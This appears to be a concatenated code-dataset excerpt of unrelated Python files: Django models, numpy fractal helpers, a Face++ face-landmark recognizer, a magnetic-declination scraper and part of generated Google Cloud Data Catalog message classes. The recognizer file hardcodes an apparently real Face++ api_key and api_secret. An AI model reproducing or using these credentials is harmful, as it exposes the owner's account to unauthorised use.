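class Images(models.Model):
    image = models.ImageField(upload_to='images/')
    image_name = models.CharField(max_length=60)
    image_caption = models.TextField(blank=True)
    likes = models.IntegerField(default=0)

class Comments(models.Model):
    image = models.ForeignKey(Images, related_name='comments', on_delete=models.CASCADE)
    comment = models.TextField()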
pereradrian/mandelbruh
mandelbruh/util.py
fb68c5f2af84d51097e73f3a248e3a1b95fbbf47
import numpy as np

def normalize(x):
    return x / np.linalg.norm(x)

def norm_sq(v):
    return np.dot(v,v)

def norm(v):
    return np.linalg.norm(v)

def get_sub_keys(v):
    if type(v) is not tuple and type(v) is not list:
        return []
    return [k for k in v if type(k) is str]

def to_vec3(v):
    if isinstance(v, (float, int)):
        return np.array([v, v, v], dtype=np.float32)
    elif len(get_sub_keys(v)) > 0:
        return v
    else:
        return np.array([v[0], v[1], v[2]], dtype=np.float32)

def to_str(x):
    if type(x) is bool:
        return "1" if x else "0"
    elif isinstance(x, (list, tuple)):
        return vec3_str(x)
    else:
        return str(x)

def float_str(x):
    if type(x) is str:
        return '_' + x
    else:
        return str(x)

def vec3_str(v):
    if type(v) is str:
        return '_' + v
    elif isinstance(v, (float, int)):
        return 'vec3(' + str(v) + ')'
    else:
        return 'vec3(' + float_str(v[0]) + ',' + float_str(v[1]) + ',' + float_str(v[2]) + ')'

def vec3_eq(v, val):
    if type(v) is str:
        return False
    for i in range(3):
        if v[i] != val[i]:
            return False
    return True

def smin(a, b, k):
    h = min(max(0.5 + 0.5*(b - a)/k, 0.0), 1.0)
    return b*(1 - h) + a*h - k*h*(1.0 - h)

def get_global(k):
    if type(k) is str:
        return _mandelbruh_GLOBAL_VARS[k]
    elif type(k) is tuple or type(k) is list:
        return np.array([get_global(i) for i in k], dtype=np.float32)
    else:
        return k

def set_global_float(k):
    if type(k) is str:
        _mandelbruh_GLOBAL_VARS[k] = 0.0
    return k

def set_global_vec3(k):
    if type(k) is str:
        _mandelbruh_GLOBAL_VARS[k] = to_vec3((0,0,0))
        return k
    elif isinstance(k, (float, int)):
        return to_vec3(k)
    else:
        sk = get_sub_keys(k)
        for i in sk:
            _mandelbruh_GLOBAL_VARS[i] = 0.0
        return to_vec3(k)

def cond_offset(p):
    if type(p) is str or np.count_nonzero(p) > 0:
        return ' - vec4(' + vec3_str(p) + ', 0)'
    return ''

def cond_subtract(p):
    if type(p) is str or p > 0:
        return ' - ' + float_str(p)
    return ''

def make_color(geo):
    if type(geo.color) is tuple or type(geo.color) is np.ndarray:
        return 'vec4(' + vec3_str(geo.color) + ', ' + geo.glsl() + ')'
    elif geo.color == 'orbit' or geo.color == 'o':
        return 'vec4(orbit, ' + geo.glsl() + ')'
    else:
        raise Exception("Invalid coloring type")

_mandelbruh_GLOBAL_VARS = {}
[((7, 8, 7, 19), 'numpy.dot', 'np.dot', ({(7, 15, 7, 16): 'v', (7, 17, 7, 18): 'v'}, {}), '(v, v)', True, 'import numpy as np\n'), ((10, 8, 10, 25), 'numpy.linalg.norm', 'np.linalg.norm', ({(10, 23, 10, 24): 'v'}, {}), '(v)', True, 'import numpy as np\n'), ((4, 12, 4, 29), 'numpy.linalg.norm', 'np.linalg.norm', ({(4, 27, 4, 28): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((19, 9, 19, 46), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((23, 9, 23, 55), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((85, 22, 85, 41), 'numpy.count_nonzero', 'np.count_nonzero', ({(85, 39, 85, 40): 'p'}, {}), '(p)', True, 'import numpy as np\n')]
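Two of the helpers above do most of the work downstream: to_vec3 coerces scalars and tuples into float32 vectors for GLSL emission, and smin is the polynomial smooth minimum used when blending distance fields. A few illustrative calls with arbitrary values:

# Illustrative calls against the helpers defined above.
print(to_vec3(1.5))                  # [1.5 1.5 1.5]
print(vec3_str((1.0, 2.0, 3.0)))     # vec3(1.0,2.0,3.0)
print(smin(1.0, 2.0, 0.5))           # 1.0 -- values far apart relative to k, so plain min
print(smin(1.0, 1.1, 0.5))           # 0.92 -- close values, so the blend kicks in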
awen1988/yry
core/recognizer.py
b65ccd7062d60f605fc978a87e060d0015cf1d4c
""" recognize face landmark """ import json import os import requests import numpy as np FACE_POINTS = list(range(0, 83)) JAW_POINTS = list(range(0, 19)) LEFT_EYE_POINTS = list(range(19, 29)) LEFT_BROW_POINTS = list(range(29, 37)) MOUTH_POINTS = list(range(37, 55)) NOSE_POINTS = list(range(55, 65)) RIGHT_EYE_POINTS = list(range(65, 75)) RIGHT_BROW_POINTS = list(range(75, 83)) LEFT_FACE = list(range(0, 10)) + list(range(29, 34)) RIGHT_FACE = list(range(9, 19)) + list(range(75, 80)) JAW_END = 19 FACE_START = 0 FACE_END = 83 OVERLAY_POINTS = [ LEFT_FACE, RIGHT_FACE, JAW_POINTS, ] def face_points(image): points = [] txt = image + '.txt' if os.path.isfile(txt): with open(txt) as file: for line in file: points = line elif os.path.isfile(image): points = landmarks_by_face__(image) with open(txt, 'w') as file: file.write(str(points)) faces = json.loads(points)['faces'] if len(faces) == 0: err = 404 else: err = 0 matrix_list = np.matrix(matrix_marks(faces[0]['landmark'])) point_list = [] for p in matrix_list.tolist(): point_list.append((int(p[0]), int(p[1]))) return matrix_list, point_list, err def landmarks_by_face__(image): url = 'https://api-cn.faceplusplus.com/facepp/v3/detect' params = { 'api_key': 'ZBbrYf41rX5AJ2mVDEcdIERF7HOlpG6t', 'api_secret': 'G5qlzXk7Wd9iE6MlORYPRulJ2lihdt9U', 'return_landmark': 1, } file = {'image_file': open(image, 'rb')} r = requests.post(url=url, files=file, data=params) if r.status_code == requests.codes.ok: return r.content.decode('utf-8') else: return r.content def matrix_rectangle(left, top, width, height): pointer = [ (left, top), (left + width / 2, top), (left + width - 1, top), (left + width - 1, top + height / 2), (left, top + height / 2), (left, top + height - 1), (left + width / 2, top + height - 1), (left + width - 1, top + height - 1) ] return pointer def matrix_marks(res): pointer = [ [res['contour_left1']['x'], res['contour_left1']['y']], [res['contour_left2']['x'], res['contour_left2']['y']], [res['contour_left3']['x'], res['contour_left3']['y']], [res['contour_left4']['x'], res['contour_left4']['y']], [res['contour_left5']['x'], res['contour_left5']['y']], [res['contour_left6']['x'], res['contour_left6']['y']], [res['contour_left7']['x'], res['contour_left7']['y']], [res['contour_left8']['x'], res['contour_left8']['y']], [res['contour_left9']['x'], res['contour_left9']['y']], [res['contour_chin']['x'], res['contour_chin']['y']], [res['contour_right9']['x'], res['contour_right9']['y']], [res['contour_right8']['x'], res['contour_right8']['y']], [res['contour_right7']['x'], res['contour_right7']['y']], [res['contour_right6']['x'], res['contour_right6']['y']], [res['contour_right5']['x'], res['contour_right5']['y']], [res['contour_right4']['x'], res['contour_right4']['y']], [res['contour_right3']['x'], res['contour_right3']['y']], [res['contour_right2']['x'], res['contour_right2']['y']], [res['contour_right1']['x'], res['contour_right1']['y']], [res['left_eye_bottom']['x'], res['left_eye_bottom']['y']], [res['left_eye_center']['x'], res['left_eye_center']['y']], [res['left_eye_left_corner']['x'], res['left_eye_left_corner']['y']], [res['left_eye_lower_left_quarter']['x'], res['left_eye_lower_left_quarter']['y']], [res['left_eye_lower_right_quarter']['x'], res['left_eye_lower_right_quarter']['y']], [res['left_eye_pupil']['x'], res['left_eye_pupil']['y']], [res['left_eye_right_corner']['x'], res['left_eye_right_corner']['y']], [res['left_eye_top']['x'], res['left_eye_top']['y']], [res['left_eye_upper_left_quarter']['x'], 
res['left_eye_upper_left_quarter']['y']], [res['left_eye_upper_right_quarter']['x'], res['left_eye_upper_right_quarter']['y']], [res['left_eyebrow_left_corner']['x'], res['left_eyebrow_left_corner']['y']], [res['left_eyebrow_upper_left_quarter']['x'], res['left_eyebrow_upper_left_quarter']['y']], [res['left_eyebrow_upper_middle']['x'], res['left_eyebrow_upper_middle']['y']], [res['left_eyebrow_upper_right_quarter']['x'], res['left_eyebrow_upper_right_quarter']['y']], [res['left_eyebrow_right_corner']['x'], res['left_eyebrow_right_corner']['y']], [res['left_eyebrow_lower_left_quarter']['x'], res['left_eyebrow_lower_left_quarter']['y']], [res['left_eyebrow_lower_middle']['x'], res['left_eyebrow_lower_middle']['y']], [res['left_eyebrow_lower_right_quarter']['x'], res['left_eyebrow_lower_right_quarter']['y']], [res['mouth_left_corner']['x'], res['mouth_left_corner']['y']], [res['mouth_lower_lip_bottom']['x'], res['mouth_lower_lip_bottom']['y']], [res['mouth_lower_lip_left_contour1']['x'], res['mouth_lower_lip_left_contour1']['y']], [res['mouth_lower_lip_left_contour2']['x'], res['mouth_lower_lip_left_contour2']['y']], [res['mouth_lower_lip_left_contour3']['x'], res['mouth_lower_lip_left_contour3']['y']], [res['mouth_lower_lip_right_contour1']['x'], res['mouth_lower_lip_right_contour1']['y']], [res['mouth_lower_lip_right_contour2']['x'], res['mouth_lower_lip_right_contour2']['y']], [res['mouth_lower_lip_right_contour3']['x'], res['mouth_lower_lip_right_contour3']['y']], [res['mouth_lower_lip_top']['x'], res['mouth_lower_lip_top']['y']], [res['mouth_right_corner']['x'], res['mouth_right_corner']['y']], [res['mouth_upper_lip_bottom']['x'], res['mouth_upper_lip_bottom']['y']], [res['mouth_upper_lip_left_contour1']['x'], res['mouth_upper_lip_left_contour1']['y']], [res['mouth_upper_lip_left_contour2']['x'], res['mouth_upper_lip_left_contour2']['y']], [res['mouth_upper_lip_left_contour3']['x'], res['mouth_upper_lip_left_contour3']['y']], [res['mouth_upper_lip_right_contour1']['x'], res['mouth_upper_lip_right_contour1']['y']], [res['mouth_upper_lip_right_contour2']['x'], res['mouth_upper_lip_right_contour2']['y']], [res['mouth_upper_lip_right_contour3']['x'], res['mouth_upper_lip_right_contour3']['y']], [res['mouth_upper_lip_top']['x'], res['mouth_upper_lip_top']['y']], [res['nose_contour_left1']['x'], res['nose_contour_left1']['y']], [res['nose_contour_left2']['x'], res['nose_contour_left2']['y']], [res['nose_contour_left3']['x'], res['nose_contour_left3']['y']], [res['nose_contour_lower_middle']['x'], res['nose_contour_lower_middle']['y']], [res['nose_contour_right1']['x'], res['nose_contour_right1']['y']], [res['nose_contour_right2']['x'], res['nose_contour_right2']['y']], [res['nose_contour_right3']['x'], res['nose_contour_right3']['y']], [res['nose_left']['x'], res['nose_left']['y']], [res['nose_right']['x'], res['nose_right']['y']], [res['nose_tip']['x'], res['nose_tip']['y']], [res['right_eye_bottom']['x'], res['right_eye_bottom']['y']], [res['right_eye_center']['x'], res['right_eye_center']['y']], [res['right_eye_left_corner']['x'], res['right_eye_left_corner']['y']], [res['right_eye_lower_left_quarter']['x'], res['right_eye_lower_left_quarter']['y']], [res['right_eye_lower_right_quarter']['x'], res['right_eye_lower_right_quarter']['y']], [res['right_eye_pupil']['x'], res['right_eye_pupil']['y']], [res['right_eye_right_corner']['x'], res['right_eye_right_corner']['y']], [res['right_eye_top']['x'], res['right_eye_top']['y']], [res['right_eye_upper_left_quarter']['x'], 
res['right_eye_upper_left_quarter']['y']], [res['right_eye_upper_right_quarter']['x'], res['right_eye_upper_right_quarter']['y']], [res['right_eyebrow_left_corner']['x'], res['right_eyebrow_left_corner']['y']], [res['right_eyebrow_upper_left_quarter']['x'], res['right_eyebrow_upper_left_quarter']['y']], [res['right_eyebrow_upper_middle']['x'], res['right_eyebrow_upper_middle']['y']], [res['right_eyebrow_upper_right_quarter']['x'], res['right_eyebrow_upper_right_quarter']['y']], [res['right_eyebrow_right_corner']['x'], res['right_eyebrow_right_corner']['y']], [res['right_eyebrow_lower_left_quarter']['x'], res['right_eyebrow_lower_left_quarter']['y']], [res['right_eyebrow_lower_middle']['x'], res['right_eyebrow_lower_middle']['y']], [res['right_eyebrow_lower_right_quarter']['x'], res['right_eyebrow_lower_right_quarter']['y']], ] return pointer
[((37, 7, 37, 26), 'os.path.isfile', 'os.path.isfile', ({(37, 22, 37, 25): 'txt'}, {}), '(txt)', False, 'import os\n'), ((71, 8, 71, 55), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((41, 9, 41, 30), 'os.path.isfile', 'os.path.isfile', ({(41, 24, 41, 29): 'image'}, {}), '(image)', False, 'import os\n'), ((46, 12, 46, 30), 'json.loads', 'json.loads', ({(46, 23, 46, 29): 'points'}, {}), '(points)', False, 'import json\n')]
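A call sketch for the module above. face_points posts the image to the Face++ detect endpoint on the first call (API credentials and network access required) and caches the landmark JSON beside the image, so the path here is purely illustrative; matrix_rectangle is pure and runs offline.

# Illustrative only: the image path is assumed, and the first call needs
# Face++ API access; later calls re-read the cached '<image>.txt'.
matrix, points, err = face_points('faces/sample.jpg')
if err == 0:
    print(len(points))   # 83 (x, y) landmark tuples

# Pure helper: eight anchor points around a bounding box.
print(matrix_rectangle(left=10, top=20, width=100, height=60))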
rafidmorshedi/mag-dec-api
magvar.py
5daff929be8cad902f8db331090c0ed77f7bdef9
import requests
import time
from bs4 import BeautifulSoup
import re

def decdeg2dms(dd):
    negative = dd < 0
    dd = abs(dd)
    minutes, seconds = divmod(dd*3600, 60)
    degrees, minutes = divmod(minutes, 60)
    if negative:
        if degrees > 0:
            degrees = -degrees
        elif minutes > 0:
            minutes = -minutes
        else:
            seconds = -seconds
    return (degrees, minutes, seconds)

def get_mag_var(lat, lon, year, month, day, elev=0):
    """Returns the magnetic variation at a particular point on earth.

    Keyword Arguments
    lat -- latitude (e.g. -34.6 deg)
    lon -- longitude (e.g. -180.6 deg)
    elev -- elevation in km (default 0.0)
    year -- year (e.g. 2015)
    month -- month (e.g. 11)
    day -- day (e.g. 30)

    Returns
    float -- magnetic variation
    """
    (latd, latm, lats) = decdeg2dms(lat)
    (lond, lonm, lons) = decdeg2dms(lon)

    payload = {'latd': latd, 'latm': latm, 'lats': lats, 'lond': lond, 'lonm': lonm,
               'lons': lons, 'elev': elev, 'year': year, 'month': month, 'day': day, 'Ein': 'D'}
    url = 'http://www.ga.gov.au/oracle/cgi/geoAGRF.sh'

    # Sleep to avoid spamming server
    time.sleep(1)

    r = requests.get(url, params=payload)

    if r.status_code == 200:
        c = r.content
        soup = BeautifulSoup(c, 'html.parser')
        deg_text = soup.find_all('b')[-1].text.strip()
        # strip out the junk so we have a number
        # Strip spaces before the search
        deg_text = deg_text.replace(" ", "")
        deg = re.search(r'D=(.*?)deg', deg_text).group(1)
        deg = float(deg)
        return deg
    else:
        return 'something went wrong'
[((42, 4, 42, 17), 'time.sleep', 'time.sleep', ({(42, 15, 42, 16): '(1)'}, {}), '(1)', False, 'import time\n'), ((44, 8, 44, 41), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((47, 15, 47, 45), 'bs4.BeautifulSoup', 'BeautifulSoup', ({(47, 29, 47, 30): 'c', (47, 31, 47, 44): '"""html.parser"""'}, {}), "(c, 'html.parser')", False, 'from bs4 import BeautifulSoup\n'), ((52, 14, 52, 48), 're.search', 're.search', ({(52, 24, 52, 37): '"""D=(.*?)deg"""', (52, 39, 52, 47): 'deg_text'}, {}), "('D=(.*?)deg', deg_text)", False, 'import re\n')]
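A call sketch for get_mag_var; it scrapes the Geoscience Australia geoAGRF service, so it needs network access and rate-limits itself with the one-second sleep above. The coordinates are arbitrary.

# Illustrative only: live HTTP request to the GA geoAGRF service.
declination = get_mag_var(lat=-33.86, lon=151.21, year=2015, month=11, day=30)
print(declination)   # a float in degrees on success, or an error string otherwise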
bopopescu/Social-Lite
google-cloud-sdk/lib/googlecloudsdk/third_party/apis/datacatalog/v1beta1/datacatalog_v1beta1_messages.py
ee05d6a7431c36ff582c8d6b58bb20a8c5f550bf
"""Generated message classes for datacatalog version v1beta1. A fully managed and highly scalable data discovery and metadata management service. """ # NOTE: This file is autogenerated and should not be edited by hand. from apitools.base.protorpclite import messages as _messages from apitools.base.py import encoding package = 'datacatalog' class Binding(_messages.Message): r"""Associates `members` with a `role`. Fields: condition: The condition that is associated with this binding. NOTE: An unsatisfied condition will not allow user access via current binding. Different bindings, including their conditions, are examined independently. members: Specifies the identities requesting access for a Cloud Platform resource. `members` can have the following values: * `allUsers`: A special identifier that represents anyone who is on the internet; with or without a Google account. * `allAuthenticatedUsers`: A special identifier that represents anyone who is authenticated with a Google account or a service account. * `user:{emailid}`: An email address that represents a specific Google account. For example, `[email protected]` . * `serviceAccount:{emailid}`: An email address that represents a service account. For example, `my-other- [email protected]`. * `group:{emailid}`: An email address that represents a Google group. For example, `[email protected]`. * `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a user that has been recently deleted. For example, `[email protected]?uid=123456789012345678901`. If the user is recovered, this value reverts to `user:{emailid}` and the recovered user retains the role in the binding. * `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a service account that has been recently deleted. For example, `my-other- [email protected]?uid=123456789012345678901`. If the service account is undeleted, this value reverts to `serviceAccount:{emailid}` and the undeleted service account retains the role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a Google group that has been recently deleted. For example, `[email protected]?uid=123456789012345678901`. If the group is recovered, this value reverts to `group:{emailid}` and the recovered group retains the role in the binding. * `domain:{domain}`: The G Suite domain (primary) that represents all the users of that domain. For example, `google.com` or `example.com`. role: Role that is assigned to `members`. For example, `roles/viewer`, `roles/editor`, or `roles/owner`. """ condition = _messages.MessageField('Expr', 1) members = _messages.StringField(2, repeated=True) role = _messages.StringField(3) class DatacatalogEntriesLookupRequest(_messages.Message): r"""A DatacatalogEntriesLookupRequest object. Fields: linkedResource: The full name of the Google Cloud Platform resource the Data Catalog entry represents. See: https://cloud.google.com/apis/design/resource_names#full_resource_name. Full names are case-sensitive. Examples: * //bigquery.googleapis.com/ projects/projectId/datasets/datasetId/tables/tableId * //pubsub.googleapis.com/projects/projectId/topics/topicId sqlResource: The SQL name of the entry. SQL names are case-sensitive. 
Examples: * `cloud_pubsub.project_id.topic_id` * ``pubsub.project_id.`topic.id.with.dots` `` * `bigquery.table.project_id.dataset_id.table_id` * `bigquery.dataset.project_id.dataset_id` * `datacatalog.entry.project_id.location_id.entry_group_id.entry_id` `*_id`s shoud satisfy the standard SQL rules for identifiers. https://cloud.google.com/bigquery/docs/reference/standard-sql/lexical. """ linkedResource = _messages.StringField(1) sqlResource = _messages.StringField(2) class DatacatalogProjectsLocationsEntryGroupsCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsCreateRequest object. Fields: entryGroupId: Required. The id of the entry group to create. The id must begin with a letter or underscore, contain only English letters, numbers and underscores, and be at most 64 characters. googleCloudDatacatalogV1beta1EntryGroup: A GoogleCloudDatacatalogV1beta1EntryGroup resource to be passed as the request body. parent: Required. The name of the project this entry group is in. Example: * projects/{project_id}/locations/{location} Note that this EntryGroup and its child resources may not actually be stored in the location in this name. """ entryGroupId = _messages.StringField(1) googleCloudDatacatalogV1beta1EntryGroup = _messages.MessageField('GoogleCloudDatacatalogV1beta1EntryGroup', 2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsEntryGroupsDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsDeleteRequest object. Fields: force: Optional. If true, deletes all entries in the entry group. name: Required. The name of the entry group. For example, `projects/{project_id}/locations/{location}/entryGroups/{entry_group_id} `. """ force = _messages.BooleanField(1) name = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesCreateRequest object. Fields: entryId: Required. The id of the entry to create. googleCloudDatacatalogV1beta1Entry: A GoogleCloudDatacatalogV1beta1Entry resource to be passed as the request body. parent: Required. The name of the entry group this entry is in. Example: * projects/{project_id}/locations/{location}/entryGroups/{entry_group_id} Note that this Entry and its child resources may not actually be stored in the location in this name. """ entryId = _messages.StringField(1) googleCloudDatacatalogV1beta1Entry = _messages.MessageField('GoogleCloudDatacatalogV1beta1Entry', 2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesDeleteRequest object. Fields: name: Required. The name of the entry. Example: * projects/{project_id}/l ocations/{location}/entryGroups/{entry_group_id}/entries/{entry_id} """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. 
""" getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesGetRequest object. Fields: name: Required. The name of the entry. Example: * projects/{project_id}/l ocations/{location}/entryGroups/{entry_group_id}/entries/{entry_id} Entry groups are logical groupings of entries. Currently, users cannot create/modify entry groups. They are created by Data Catalog; they include `@bigquery` for all BigQuery entries, and `@pubsub` for all Cloud Pub/Sub entries. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesPatchRequest object. Fields: googleCloudDatacatalogV1beta1Entry: A GoogleCloudDatacatalogV1beta1Entry resource to be passed as the request body. name: The Data Catalog resource name of the entry in URL format. Example: * projects/{project_id}/locations/{location}/entryGroups/{entry_group_id }/entries/{entry_id} Note that this Entry and its child resources may not actually be stored in the location in this name. updateMask: The fields to update on the entry. If absent or empty, all modifiable fields are updated. The following fields are modifiable: * For entries with type `DATA_STREAM`: * `schema` * For entries with type `FILESET` * `schema` * `display_name` * `description` * `gcs_fileset_spec` * `gcs_fileset_spec.file_patterns` """ googleCloudDatacatalogV1beta1Entry = _messages.MessageField('GoogleCloudDatacatalogV1beta1Entry', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsEntryGroupsEntriesTagsCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsCreateRequest object. Fields: googleCloudDatacatalogV1beta1Tag: A GoogleCloudDatacatalogV1beta1Tag resource to be passed as the request body. parent: Required. The name of the resource to attach this tag to. Tags can be attached to Entries. Example: * projects/{project_id}/locations/{loc ation}/entryGroups/{entry_group_id}/entries/{entry_id} Note that this Tag and its child resources may not actually be stored in the location in this name. """ googleCloudDatacatalogV1beta1Tag = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 1) parent = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesTagsDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsDeleteRequest object. Fields: name: Required. The name of the tag to delete. Example: * projects/{proje ct_id}/locations/{location}/entryGroups/{entry_group_id}/entries/{entry_ id}/tags/{tag_id} """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesTagsListRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsListRequest object. Fields: pageSize: The maximum number of tags to return. Default is 10. Max limit is 1000. pageToken: Token that specifies which page is requested. If empty, the first page is returned. parent: Required. The name of the Data Catalog resource to list the tags of. The resource could be an Entry. 
""" pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32) pageToken = _messages.StringField(2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesTagsPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsPatchRequest object. Fields: googleCloudDatacatalogV1beta1Tag: A GoogleCloudDatacatalogV1beta1Tag resource to be passed as the request body. name: The resource name of the tag in URL format. Example: * projects/{pr oject_id}/locations/{location}/entrygroups/{entry_group_id}/entries/{ent ry_id}/tags/{tag_id} where `tag_id` is a system-generated identifier. Note that this Tag may not actually be stored in the location in this name. updateMask: The fields to update on the Tag. If absent or empty, all modifiable fields are updated. Currently the only modifiable field is the field `fields`. """ googleCloudDatacatalogV1beta1Tag = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsEntryGroupsEntriesTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class DatacatalogProjectsLocationsEntryGroupsGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. """ getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsEntryGroupsGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsGetRequest object. Fields: name: Required. The name of the entry group. For example, `projects/{project_id}/locations/{location}/entryGroups/{entry_group_id} `. readMask: The fields to return. If not set or empty, all fields are returned. """ name = _messages.StringField(1, required=True) readMask = _messages.StringField(2) class DatacatalogProjectsLocationsEntryGroupsSetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsSetIamPolicyRequest object. Fields: resource: REQUIRED: The resource for which the policy is being specified. See the operation documentation for the appropriate value for this field. setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2) class DatacatalogProjectsLocationsEntryGroupsTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. 
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class DatacatalogProjectsLocationsTagTemplatesCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesCreateRequest object. Fields: googleCloudDatacatalogV1beta1TagTemplate: A GoogleCloudDatacatalogV1beta1TagTemplate resource to be passed as the request body. parent: Required. The name of the project and the location this template is in. Example: * projects/{project_id}/locations/{location} TagTemplate and its child resources may not actually be stored in the location in this name. tagTemplateId: Required. The id of the tag template to create. """ googleCloudDatacatalogV1beta1TagTemplate = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplate', 1) parent = _messages.StringField(2, required=True) tagTemplateId = _messages.StringField(3) class DatacatalogProjectsLocationsTagTemplatesDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesDeleteRequest object. Fields: force: Required. Currently, this field must always be set to `true`. This confirms the deletion of any possible tags using this template. `force = false` will be supported in the future. name: Required. The name of the tag template to delete. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } """ force = _messages.BooleanField(1) name = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTagTemplatesFieldsCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesFieldsCreateRequest object. Fields: googleCloudDatacatalogV1beta1TagTemplateField: A GoogleCloudDatacatalogV1beta1TagTemplateField resource to be passed as the request body. parent: Required. The name of the project this template is in. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } Note that this TagTemplateField may not actually be stored in the location in this name. tagTemplateFieldId: Required. The ID of the tag template field to create. Field ids can contain letters (both uppercase and lowercase), numbers (0-9), underscores (_) and dashes (-). Field IDs must be at least 1 character long and at most 128 characters long. Field IDs must also be unique within their template. """ googleCloudDatacatalogV1beta1TagTemplateField = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplateField', 1) parent = _messages.StringField(2, required=True) tagTemplateFieldId = _messages.StringField(3) class DatacatalogProjectsLocationsTagTemplatesFieldsDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesFieldsDeleteRequest object. Fields: force: Required. Currently, this field must always be set to `true`. This confirms the deletion of this field from any tags using this field. `force = false` will be supported in the future. name: Required. The name of the tag template field to delete. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id }/fields/{tag_template_field_id} """ force = _messages.BooleanField(1) name = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTagTemplatesFieldsPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesFieldsPatchRequest object. 
Fields: googleCloudDatacatalogV1beta1TagTemplateField: A GoogleCloudDatacatalogV1beta1TagTemplateField resource to be passed as the request body. name: Required. The name of the tag template field. Example: * projects/{ project_id}/locations/{location}/tagTemplates/{tag_template_id}/fields/{ tag_template_field_id} updateMask: Optional. The field mask specifies the parts of the template to be updated. Allowed fields: * `display_name` * `type.enum_type` * `is_required` If `update_mask` is not set or empty, all of the allowed fields above will be updated. When updating an enum type, the provided values will be merged with the existing values. Therefore, enum values can only be added, existing enum values cannot be deleted nor renamed. Updating a template field from optional to required is NOT allowed. """ googleCloudDatacatalogV1beta1TagTemplateField = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplateField', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsTagTemplatesFieldsRenameRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesFieldsRenameRequest object. Fields: 